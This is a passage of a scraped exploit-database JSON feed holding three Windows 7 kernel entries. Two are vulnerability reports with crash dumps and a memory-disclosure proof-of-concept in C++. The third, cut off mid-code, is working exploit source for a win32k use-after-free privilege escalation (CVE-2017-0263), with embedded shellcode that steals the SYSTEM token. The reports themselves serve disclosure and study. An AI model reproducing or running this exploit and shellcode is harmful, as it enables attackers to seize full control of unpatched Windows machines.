as an argument to the SOCKADDR_SIZE function. The SOCKADDR_SIZE function is mostly just a wrapper around the constant sockaddr_size[] array, which has the following values:\r\n \r\n * indexes 0x00..0x01: 0x00\r\n * index 0x02: 0x10\r\n * indexes 0x03..0x16: 0x00\r\n * index 0x17: 0x1C\r\n * indexes 0x16..0x21: 0x00\r\n \r\nThe double fetch makes it possible for the first WORD of the structure to have different values on each access from kernel-mode (through another thread concurrently flipping its bits). For example, it could have the valid value 2 or 0x17 at the time of the memmove(), but any other value at the time of the direct access. This would lead to comparing the input structure size with 0 (which is the corresponding entry in sockaddr_size[]), effectively nullifying the sanitization. Other code down the execution flow may then assume that the size of the buffer has been correctly verified, and access some fields at predefined offsets, which may be located outside of the allocated buffer, if the user specifies a very small size.\r\n \r\nIn our case, the confused code is in tcpip!TcpBindEndpoint, which tries to copy an excessive number of bytes from a very small allocation. A crash log excerpt is shown below:\r\n \r\n--- cut ---\r\n DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)\r\n N bytes of memory was allocated and more than N bytes are being referenced.\r\n This cannot be protected by try-except.\r\n When possible, the guilty driver's name (Unicode string) is printed on\r\n the bugcheck screen and saved in KiBugCheckDriver.\r\n Arguments:\r\n Arg1: 8c5ed000, memory referenced\r\n Arg2: 00000000, value 0 = read operation, 1 = write operation\r\n Arg3: 84c703fe, if non-zero, the address which referenced memory.\r\n Arg4: 00000000, (reserved)\r\n \r\n Debugging Details:\r\n ------------------\r\n \r\n [...]\r\n \r\n TRAP_FRAME: 96647818 -- (.trap 0xffffffff96647818)\r\n ErrCode = 00000000\r\n eax=9512d970 ebx=95051020 ecx=00000003 edx=00000000 esi=8c5ed000 edi=9505104c\r\n eip=84c703fe esp=9664788c ebp=96647898 iopl=0 nv up ei ng nz ac po cy\r\n cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010293\r\n tcpip!TcpBindEndpoint+0x51:\r\n 84c703fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n Resetting default scope\r\n \r\n LAST_CONTROL_TRANSFER: from 81722dff to 816be9d8\r\n \r\n STACK_TEXT: \r\n 9664736c 81722dff 00000003 d1dfd5f3 00000065 nt!RtlpBreakWithStatusInstruction\r\n 966473bc 817238fd 00000003 00000000 00000004 nt!KiBugCheckDebugBreak+0x1c\r\n 96647780 816d199d 00000050 8c5ed000 00000000 nt!KeBugCheck2+0x68b\r\n 96647800 81683f98 00000000 8c5ed000 00000000 nt!MmAccessFault+0x104\r\n 96647800 84c703fe 00000000 8c5ed000 00000000 nt!KiTrap0E+0xdc\r\n 96647898 84c7039e 951769a0 8c2e3896 9512d970 tcpip!TcpBindEndpoint+0x51\r\n 966478b8 84c72900 951769a0 966479cc 00000000 tcpip!TcpIoControlEndpoint+0x199\r\n 966478cc 816ccbe5 9664795c d1dfdf7b 00000000 tcpip!TcpTlEndpointIoControlEndpointCalloutRoutine+0x8b\r\n 96647934 84c6d89e 84c72875 9664795c 00000000 nt!KeExpandKernelStackAndCalloutEx+0x132\r\n 9664796c 8c2e05ed 95176900 96647901 966479f8 tcpip!TcpTlEndpointIoControlEndpoint+0x67\r\n 966479a0 8c2e06aa 84c6d837 951769a0 966479cc afd!AfdTLIoControl+0x33\r\n 966479b8 8c2e3afa 8c53eef0 966479cc 9512d970 afd!AfdTLEndpointIoControl+0x1a\r\n 966479f8 8c2e388a 9512d970 8c53eef0 9512d970 afd!AfdTLBind+0x4b\r\n 96647a40 8c2d3eb8 9512d970 8c53eef0 00000000 afd!AfdTLBindSecurity+0x108\r\n 96647aac 8c2e02bc 85e81198 9512d970 96647ae0 afd!AfdBind+0x283\r\n 96647abc 8197d4d9 8bc0edd0 9512d970 85e81198 afd!AfdDispatchDeviceControl+0x3b\r\n 96647ae0 8167a0e0 818727af 9512d970 8bc0edd0 nt!IovCallDriver+0x73\r\n 96647af4 818727af 00000000 9512d970 9512da4c nt!IofCallDriver+0x1b\r\n 96647b14 81875afe 8bc0edd0 85e81198 00000000 nt!IopSynchronousServiceTail+0x1f8\r\n 96647bd0 818bcab0 00000054 9512d970 00000000 nt!IopXxxControlFile+0x810\r\n 96647c04 81680db6 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n 96647c04 77716c74 00000054 00000000 00000000 nt!KiSystemServicePostCall\r\n 0034f8b8 7771542c 75acab4d 00000054 00000000 ntdll!KiFastSystemCallRet\r\n 0034f8bc 75acab4d 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc\r\n 0034f91c 7712bb75 00000054 00012003 001530d0 KERNELBASE!DeviceIoControl+0xf6\r\n 0034f948 00141141 00000054 00012003 001530d0 kernel32!DeviceIoControlImplementation+0x80\r\n [...]\r\n--- cut ---\r\n \r\nWe suspect it should be possible to extract some of the junk pool memory back to user-mode, e.g. through the IP address and port assigned to the socket in question. The issue reproduces on Windows 7, and is easiest to observe with Special Pools enabled for the afd.sys module. Attached is a afdbind_doublefetch.cpp file which is the C++ source code of a proof-of-concept program for the issue.\r\n \r\n----------[ Buffer size sanitization logic in afd!AfdBind and tcpip!TcpBindEndpoint ]----------\r\n \r\nAs discussed before, the sockaddr_size[] array used during input structure size sanitization is full of 0x00's, except for indexes 0x2 and 0x17 (which are probably the only two valid packet types). Thus, if we call an IOCTL with the WORD containing a value other than the two, the sanitization will be virtually non-existent, and the input buffer is allowed to have any size at all. However, if we take a look at the tcpip!TcpBindEndpoint routine, we can see the following logic:\r\n \r\n--- cut ---\r\n .text:000533EC cmp word ptr [esi], 2\r\n .text:000533F0 lea edi, [ebx+1Ch]\r\n .text:000533F3 jnz short loc_533FB\r\n .text:000533F5 movsd\r\n .text:000533F6 movsd\r\n .text:000533F7 movsd\r\n .text:000533F8 movsd\r\n .text:000533F9 jmp short loc_53400\r\n .text:000533FB\r\n .text:000533FB loc_533FB:\r\n .text:000533FB push 7\r\n .text:000533FD pop ecx\r\n .text:000533FE rep movsd\r\n--- cut ---\r\n \r\nwhich translates to:\r\n \r\n--- cut ---\r\n if (lpKernelStruct->dwStructType == 2) {\r\n memcpy(lpNewStruct, lpKernelStruct, 0x10);\r\n } else {\r\n memcpy(lpNewStruct, lpKernelStruct, 0x1C);\r\n }\r\n--- cut ---\r\n \r\nIn other words, if the first WORD doesn't equal 2, the function assumes that it must equal 0x17 and thus the buffer must have been verified to be at least 0x1C bytes long. However, as the dwStructType value and buffer size may be arbitrary, an out-of-bounds read of at most ~0x1C bytes may occur in the memcpy() call. An excerpt from a subsequent crash is shown below (very similar to the previous one):\r\n \r\n--- cut ---\r\n DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)\r\n N bytes of memory was allocated and more than N bytes are being referenced.\r\n This cannot be protected by try-except.\r\n When possible, the guilty driver's name (Unicode string) is printed on\r\n the bugcheck screen and saved in KiBugCheckDriver.\r\n Arguments:\r\n Arg1: 8b523000, memory referenced\r\n Arg2: 00000000, value 0 = read operation, 1 = write operation\r\n Arg3: 84e793fe, if non-zero, the address which referenced memory.\r\n Arg4: 00000000, (reserved)\r\n \r\n Debugging Details:\r\n ------------------\r\n \r\n [...]\r\n \r\n TRAP_FRAME: 88c67818 -- (.trap 0xffffffff88c67818)\r\n ErrCode = 00000000\r\n eax=84492318 ebx=94e30020 ecx=00000003 edx=00000000 esi=8b523000 edi=94e3004c\r\n eip=84e793fe esp=88c6788c ebp=88c67898 iopl=0 nv up ei ng nz ac po cy\r\n cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010293\r\n tcpip!TcpBindEndpoint+0x51:\r\n 84e793fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n Resetting default scope\r\n \r\n LAST_CONTROL_TRANSFER: from 82730dff to 826cc9d8\r\n \r\n STACK_TEXT: \r\n 88c6736c 82730dff 00000003 fbe6b7bb 00000065 nt!RtlpBreakWithStatusInstruction\r\n 88c673bc 827318fd 00000003 00000000 00000004 nt!KiBugCheckDebugBreak+0x1c\r\n 88c67780 826df99d 00000050 8b523000 00000000 nt!KeBugCheck2+0x68b\r\n 88c67800 82691f98 00000000 8b523000 00000000 nt!MmAccessFault+0x104\r\n 88c67800 84e793fe 00000000 8b523000 00000000 nt!KiTrap0E+0xdc\r\n 88c67898 84e7939e 95464008 8b8ca896 84492318 tcpip!TcpBindEndpoint+0x51\r\n 88c678b8 84e7b900 95464008 88c679cc 00000000 tcpip!TcpIoControlEndpoint+0x199\r\n 88c678cc 826dabe5 88c6795c fbe6bd33 00000000 tcpip!TcpTlEndpointIoControlEndpointCalloutRoutine+0x8b\r\n 88c67934 84e7689e 84e7b875 88c6795c 00000000 nt!KeExpandKernelStackAndCalloutEx+0x132\r\n 88c6796c 8b8c75ed 95464000 88c67901 88c679f8 tcpip!TcpTlEndpointIoControlEndpoint+0x67\r\n 88c679a0 8b8c76aa 84e76837 95464008 88c679cc afd!AfdTLIoControl+0x33\r\n 88c679b8 8b8caafa 8b54aef0 88c679cc 84492318 afd!AfdTLEndpointIoControl+0x1a\r\n 88c679f8 8b8ca88a 84492318 8b54aef0 84492318 afd!AfdTLBind+0x4b\r\n 88c67a40 8b8baeb8 84492318 8b54aef0 00000000 afd!AfdTLBindSecurity+0x108\r\n 88c67aac 8b8c72bc 95463210 84492318 88c67ae0 afd!AfdBind+0x283\r\n 88c67abc 8298b4d9 86cac1a0 84492318 95463210 afd!AfdDispatchDeviceControl+0x3b\r\n 88c67ae0 826880e0 828807af 84492318 86cac1a0 nt!IovCallDriver+0x73\r\n 88c67af4 828807af 00000000 84492318 844923f4 nt!IofCallDriver+0x1b\r\n 88c67b14 82883afe 86cac1a0 95463210 00000000 nt!IopSynchronousServiceTail+0x1f8\r\n 88c67bd0 828caab0 00000054 84492318 00000000 nt!IopXxxControlFile+0x810\r\n 88c67c04 8268edb6 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n 88c67c04 775a6c74 00000054 00000000 00000000 nt!KiSystemServicePostCall\r\n 0024faa4 775a542c 7570ab4d 00000054 00000000 ntdll!KiFastSystemCallRet\r\n 0024faa8 7570ab4d 00000054 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc\r\n 0024fb08 75d1bb75 00000054 00012003 0024fc38 KERNELBASE!DeviceIoControl+0xf6\r\n 0024fb34 010b120b 00000054 00012003 0024fc38 kernel32!DeviceIoControlImplementation+0x80\r\n [...]\r\n--- cut ---\r\n \r\nThe issue reproduces on Windows 7, and is easiest to observe with Special Pools enabled for the afd.sys module. Attached is a afdbind_tcpip_oob_read.cpp file which is the C++ source code of a proof-of-concept program for the issue.\r\n \r\n \r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42009.zip\n\n# 0day.today [2018-02-16] #", "sourceHref": "https://0day.today/exploit/27774", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-10T07:41:06", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27776", "href": "https://0day.today/exploit/description/27776", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145\r\n \r\nWe have observed (on Windows 7 32-bit) that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens (lsass.exe, services.exe, ...) has 8 uninitialized bytes at the end, as the size of the structure (ACL.AclSize) is larger than the sum of ACE lengths (ACE_HEADER.AceSize). It is possible to read the leftover pool data using a GetTokenInformation(TokenDefaultDacl) call.\r\n \r\nWhen the attached proof-of-concept code is run against a SYSTEM process (pid of the process must be passed in the program argument), on a system with Special Pools enabled for ntoskrnl.exe, output similar to the following can be observed:\r\n \r\n>NtQueryInformationToken.exe 520\r\n00000000: 54 bf 2b 00 02 00 3c 00 02 00 00 00 00 00 14 00 T.+...<.........\r\n00000010: 00 00 00 10 01 01 00 00 00 00 00 05 12 00 00 00 ................\r\n00000020: 00 00 18 00 00 00 02 a0 01 02 00 00 00 00 00 05 ................\r\n00000030: 20 00 00 00 20 02 00 00[01 01 01 01 01 01 01 01] ... ...........\r\n \r\nThe last eight 0x01 bytes are markers inserted by Special Pools, which visibly haven't been overwritten by any actual data prior to being returned to user-mode.\r\n \r\nWhile reading DACLs of system processes may require special privileges (such as the ability to acquire SeDebugPrivilege), the root cause of the behavior could potentially make it possible to also create uninitialized DACLs that are easily accessible by regular users. This could in turn lead to a typical kernel memory disclosure condition, which would allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. Since it's not clear to us what causes the abberant behavior, we're reporting it for further analysis to be on the safe side.\r\n \r\nThe proof-of-concept code is mostly based on the example at https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege.\r\n*/\r\n \r\n#define RTN_OK 0\r\n#define RTN_USAGE 1\r\n#define RTN_ERROR 13\r\n \r\n#include <windows.h>\r\n#include <stdio.h>\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. FALSE to disable\r\n );\r\n \r\nvoid DisplayError(LPTSTR szAPI);\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes);\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n HANDLE hProcess;\r\n HANDLE hToken;\r\n int dwRetVal = RTN_OK; // assume success from main()\r\n \r\n // show correct usage for kill\r\n if (argc != 2)\r\n {\r\n fprintf(stderr, \"Usage: %s [ProcessId]\\n\", argv[0]);\r\n return RTN_USAGE;\r\n }\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken))\r\n {\r\n if (GetLastError() == ERROR_NO_TOKEN)\r\n {\r\n if (!ImpersonateSelf(SecurityImpersonation))\r\n return RTN_ERROR;\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)){\r\n DisplayError(L\"OpenThreadToken\");\r\n return RTN_ERROR;\r\n }\r\n }\r\n else\r\n return RTN_ERROR;\r\n }\r\n \r\n // enable SeDebugPrivilege\r\n if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE))\r\n {\r\n DisplayError(L\"SetPrivilege\");\r\n \r\n // close token handle\r\n CloseHandle(hToken);\r\n \r\n // indicate failure\r\n return RTN_ERROR;\r\n }\r\n \r\n CloseHandle(hToken);\r\n \r\n // open the process\r\n if ((hProcess = OpenProcess(\r\n PROCESS_QUERY_INFORMATION,\r\n FALSE,\r\n atoi(argv[1]) // PID from commandline\r\n )) == NULL)\r\n {\r\n DisplayError(L\"OpenProcess\");\r\n return RTN_ERROR;\r\n }\r\n \r\n // Open process token.\r\n if (!OpenProcessToken(hProcess, TOKEN_READ, &hToken)) {\r\n DisplayError(L\"OpenProcessToken\");\r\n return RTN_ERROR;\r\n }\r\n \r\n DWORD ReturnLength = 0;\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, NULL, 0, &ReturnLength) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {\r\n DisplayError(L\"GetTokenInformation #1\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength);\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, OutputBuffer, ReturnLength, &ReturnLength)) {\r\n DisplayError(L\"GetTokenInformation #2\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PrintHex(OutputBuffer, ReturnLength);\r\n \r\n // close handles\r\n HeapFree(GetProcessHeap(), 0, OutputBuffer);\r\n CloseHandle(hProcess);\r\n \r\n return dwRetVal;\r\n}\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. FALSE to disable\r\n )\r\n{\r\n TOKEN_PRIVILEGES tp;\r\n LUID luid;\r\n TOKEN_PRIVILEGES tpPrevious;\r\n DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);\r\n \r\n if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;\r\n \r\n // \r\n // first pass. get current privilege setting\r\n // \r\n tp.PrivilegeCount = 1;\r\n tp.Privileges[0].Luid = luid;\r\n tp.Privileges[0].Attributes = 0;\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tp,\r\n sizeof(TOKEN_PRIVILEGES),\r\n &tpPrevious,\r\n &cbPrevious\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n // \r\n // second pass. set privilege based on previous setting\r\n // \r\n tpPrevious.PrivilegeCount = 1;\r\n tpPrevious.Privileges[0].Luid = luid;\r\n \r\n if (bEnablePrivilege) {\r\n tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED);\r\n }\r\n else {\r\n tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &\r\n tpPrevious.Privileges[0].Attributes);\r\n }\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tpPrevious,\r\n cbPrevious,\r\n NULL,\r\n NULL\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n return TRUE;\r\n}\r\n \r\nvoid DisplayError(\r\n LPTSTR szAPI // pointer to failed API name\r\n )\r\n{\r\n LPTSTR MessageBuffer;\r\n DWORD dwBufferLength;\r\n \r\n fwprintf(stderr, L\"%s() error!\\n\", szAPI);\r\n \r\n if (dwBufferLength = FormatMessage(\r\n FORMAT_MESSAGE_ALLOCATE_BUFFER |\r\n FORMAT_MESSAGE_FROM_SYSTEM,\r\n NULL,\r\n GetLastError(),\r\n GetSystemDefaultLangID(),\r\n (LPTSTR)&MessageBuffer,\r\n 0,\r\n NULL\r\n ))\r\n {\r\n DWORD dwBytesWritten;\r\n \r\n // \r\n // Output message string on stderr\r\n // \r\n WriteFile(\r\n GetStdHandle(STD_ERROR_HANDLE),\r\n MessageBuffer,\r\n dwBufferLength,\r\n &dwBytesWritten,\r\n NULL\r\n );\r\n \r\n // \r\n // free the buffer allocated by the system\r\n // \r\n LocalFree(MessageBuffer);\r\n }\r\n}\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27776", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-18T02:33:50", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0263"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30198", "href": "https://0day.today/exploit/description/30198", "sourceData": "#include <Windows.h>\r\n#include <wingdi.h>\r\n#include <iostream>\r\n#include <Psapi.h>\r\n#pragma comment(lib, \"psapi.lib\")\r\n \r\n#define POCDEBUG 0\r\n \r\n#if POCDEBUG == 1\r\n#define POCDEBUG_BREAK() getchar()\r\n#elif POCDEBUG == 2\r\n#define POCDEBUG_BREAK() DebugBreak()\r\n#else\r\n#define POCDEBUG_BREAK()\r\n#endif\r\n \r\nstatic PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;\r\n \r\nstatic constexpr UINT num_PopupMenuCount = 2;\r\nstatic constexpr UINT num_WndShadowCount = 3;\r\nstatic constexpr UINT num_NtUserMNDragLeave = 0x11EC;\r\nstatic constexpr UINT num_offset_WND_pcls = 0x64;\r\n \r\nstatic HMENU hpopupMenu[num_PopupMenuCount] = { 0 };\r\nstatic UINT iMenuCreated = 0;\r\nstatic BOOL bDoneExploit = FALSE;\r\nstatic DWORD popupMenuRoot = 0;\r\nstatic HWND hWindowMain = NULL;\r\nstatic HWND hWindowHunt = NULL;\r\nstatic HWND hWindowList[0x100] = { 0 };\r\nstatic UINT iWindowCount = 0;\r\nstatic PVOID pvHeadFake = NULL;\r\nstatic PVOID pvAddrFlags = NULL;\r\n \r\ntypedef struct _HEAD {\r\n HANDLE h;\r\n DWORD cLockObj;\r\n} HEAD, *PHEAD;\r\n \r\ntypedef struct _THROBJHEAD {\r\n HEAD head;\r\n PVOID pti;\r\n} THROBJHEAD, *PTHROBJHEAD;\r\n \r\ntypedef struct _DESKHEAD {\r\n PVOID rpdesk;\r\n PBYTE pSelf;\r\n} DESKHEAD, *PDESKHEAD;\r\n \r\ntypedef struct _THRDESKHEAD {\r\n THROBJHEAD thread;\r\n DESKHEAD deskhead;\r\n} THRDESKHEAD, *PTHRDESKHEAD;\r\n \r\ntypedef struct _SHELLCODE {\r\n DWORD reserved;\r\n DWORD pid;\r\n DWORD off_CLS_lpszMenuName;\r\n DWORD off_THREADINFO_ppi;\r\n DWORD off_EPROCESS_ActiveLink;\r\n DWORD off_EPROCESS_Token;\r\n PVOID tagCLS[0x100];\r\n BYTE pfnWindProc[];\r\n} SHELLCODE, *PSHELLCODE;\r\n \r\nstatic PSHELLCODE pvShellCode = NULL;\r\n \r\n// Arguments:\r\n// [ebp+08h]:pwnd = pwndWindowHunt;\r\n// [ebp+0Ch]:msg = 0x9F9F;\r\n// [ebp+10h]:wParam = popupMenuRoot;\r\n// [ebp+14h]:lParam = NULL;\r\n// In kernel-mode, the first argument is tagWND pwnd.\r\nstatic\r\nBYTE\r\nxxPayloadWindProc[] = {\r\n // Loader+0x108a:\r\n // Judge if the `msg` is 0x9f9f value.\r\n 0x55, // push ebp\r\n 0x8b, 0xec, // mov ebp,esp\r\n 0x8b, 0x45, 0x0c, // mov eax,dword ptr [ebp+0Ch]\r\n 0x3d, 0x9f, 0x9f, 0x00, 0x00, // cmp eax,9F9Fh\r\n 0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128\r\n // Loader+0x109b:\r\n // Judge if CS is 0x1b, which means in user-mode context.\r\n 0x66, 0x8c, 0xc8, // mov ax,cs\r\n 0x66, 0x83, 0xf8, 0x1b, // cmp ax,1Bh\r\n 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128\r\n // Loader+0x10a8:\r\n // Get the address of pwndWindowHunt to ECX.\r\n // Recover the flags of pwndWindowHunt: zero bServerSideWindowProc.\r\n // Get the address of pvShellCode to EDX by CALL-POP.\r\n // Get the address of pvShellCode->tagCLS[0x100] to ESI.\r\n // Get the address of popupMenuRoot to EDI.\r\n 0xfc, // cld\r\n 0x8b, 0x4d, 0x08, // mov ecx,dword ptr [ebp+8]\r\n 0xff, 0x41, 0x16, // inc dword ptr [ecx+16h]\r\n 0x60, // pushad\r\n 0xe8, 0x00, 0x00, 0x00, 0x00, // call $5\r\n 0x5a, // pop edx\r\n 0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h\r\n 0xbb, 0x00, 0x01, 0x00, 0x00, // mov ebx,100h\r\n 0x8d, 0x72, 0x18, // lea esi,[edx+18h]\r\n 0x8b, 0x7d, 0x10, // mov edi,dword ptr [ebp+10h]\r\n // Loader+0x10c7:\r\n 0x85, 0xdb, // test ebx,ebx\r\n 0x74, 0x13, // je Loader+0x10de\r\n // Loader+0x10cb:\r\n // Judge if pvShellCode->tagCLS[ebx] == NULL\r\n 0xad, // lods dword ptr [esi]\r\n 0x4b, // dec ebx\r\n 0x83, 0xf8, 0x00, // cmp eax,0\r\n 0x74, 0xf5, // je Loader+0x10c7\r\n // Loader+0x10d2:\r\n // Judge if tagCLS->lpszMenuName == popupMenuRoot\r\n 0x03, 0x42, 0x08, // add eax,dword ptr [edx+8]\r\n 0x39, 0x38, // cmp dword ptr [eax],edi\r\n 0x75, 0xee, // jne Loader+0x10c7\r\n // Loader+0x10d9:\r\n // Zero tagCLS->lpszMenuName\r\n 0x83, 0x20, 0x00, // and dword ptr [eax],0\r\n 0xeb, 0xe9, // jmp Loader+0x10c7\r\n // Loader+0x10de:\r\n // Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX.\r\n // Get the value of pvShellCode->pid to EAX.\r\n 0x8b, 0x49, 0x08, // mov ecx,dword ptr [ecx+8]\r\n 0x8b, 0x5a, 0x0c, // mov ebx,dword ptr [edx+0Ch]\r\n 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]\r\n 0x8b, 0x09, // mov ecx,dword ptr [ecx]\r\n 0x8b, 0x5a, 0x10, // mov ebx,dword ptr [edx+10h]\r\n 0x8b, 0x42, 0x04, // mov eax,dword ptr [edx+4]\r\n 0x51, // push ecx\r\n // Loader+0x10f0:\r\n // Judge if EPROCESS->UniqueId == pid.\r\n 0x39, 0x44, 0x0b, 0xfc, // cmp dword ptr [ebx+ecx-4],eax\r\n 0x74, 0x07, // je Loader+0x10fd\r\n // Loader+0x10f6:\r\n // Get next EPROCESS to ECX by ActiveLink.\r\n 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]\r\n 0x2b, 0xcb, // sub ecx,ebx\r\n 0xeb, 0xf3, // jmp Loader+0x10f0\r\n // Loader+0x10fd:\r\n // Get current EPROCESS to EDI.\r\n 0x8b, 0xf9, // mov edi,ecx\r\n 0x59, // pop ecx\r\n // Loader+0x1100:\r\n // Judge if EPROCESS->UniqueId == 4\r\n 0x83, 0x7c, 0x0b, 0xfc, 0x04, // cmp dword ptr [ebx+ecx-4],4\r\n 0x74, 0x07, // je Loader+0x110e\r\n // Loader+0x1107:\r\n // Get next EPROCESS to ECX by ActiveLink.\r\n 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]\r\n 0x2b, 0xcb, // sub ecx,ebx\r\n 0xeb, 0xf2, // jmp Loader+0x1100\r\n // Loader+0x110e:\r\n // Get system EPROCESS to ESI.\r\n // Get the value of system EPROCESS->Token to current EPROCESS->Token.\r\n // Add 2 to OBJECT_HEADER->PointerCount of system Token.\r\n // Return 0x9F9F to the caller.\r\n 0x8b, 0xf1, // mov esi,ecx\r\n 0x8b, 0x42, 0x14, // mov eax,dword ptr [edx+14h]\r\n 0x03, 0xf0, // add esi,eax\r\n 0x03, 0xf8, // add edi,eax\r\n 0xad, // lods dword ptr [esi]\r\n 0xab, // stos dword ptr es:[edi]\r\n 0x83, 0xe0, 0xf8, // and eax,0FFFFFFF8h\r\n 0x83, 0x40, 0xe8, 0x02, // add dword ptr [eax-18h],2\r\n 0x61, // popad\r\n 0xb8, 0x9f, 0x9f, 0x00, 0x00, // mov eax,9F9Fh\r\n 0xeb, 0x05, // jmp Loader+0x112d\r\n // Loader+0x1128:\r\n // Failed in processing.\r\n 0xb8, 0x01, 0x00, 0x00, 0x00, // mov eax,1\r\n // Loader+0x112d:\r\n 0xc9, // leave\r\n 0xc2, 0x10, 0x00, // ret 10h\r\n};\r\n \r\nstatic\r\nVOID\r\nxxGetHMValidateHandle(VOID)\r\n{\r\n HMODULE hModule = LoadLibraryA(\"USER32.DLL\");\r\n PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, \"IsMenu\");\r\n PBYTE Address = NULL;\r\n for (INT i = 0; i < 0x30; i++)\r\n {\r\n if (*(WORD *)(i + pfnIsMenu) != 0x02B2)\r\n {\r\n continue;\r\n }\r\n i += 2;\r\n if (*(BYTE *)(i + pfnIsMenu) != 0xE8)\r\n {\r\n continue;\r\n }\r\n Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;\r\n Address = Address + i + 5;\r\n pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;\r\n break;\r\n }\r\n}\r\n \r\n#define TYPE_WINDOW 1\r\n \r\nstatic\r\nPVOID\r\nxxHMValidateHandleEx(HWND hwnd)\r\n{\r\n return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);\r\n}\r\n \r\nstatic\r\nPVOID\r\nxxHMValidateHandle(HWND hwnd)\r\n{\r\n PVOID RetAddr = NULL;\r\n if (!pfnHMValidateHandle)\r\n {\r\n xxGetHMValidateHandle();\r\n }\r\n if (pfnHMValidateHandle)\r\n {\r\n RetAddr = xxHMValidateHandleEx(hwnd);\r\n }\r\n return RetAddr;\r\n}\r\n \r\nstatic\r\nULONG_PTR\r\nxxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2)\r\n{\r\n __asm { mov eax, num };\r\n __asm { int 2eh };\r\n}\r\n \r\nstatic\r\nLRESULT\r\nWINAPI\r\nxxShadowWindowProc(\r\n _In_ HWND hwnd,\r\n _In_ UINT msg,\r\n _In_ 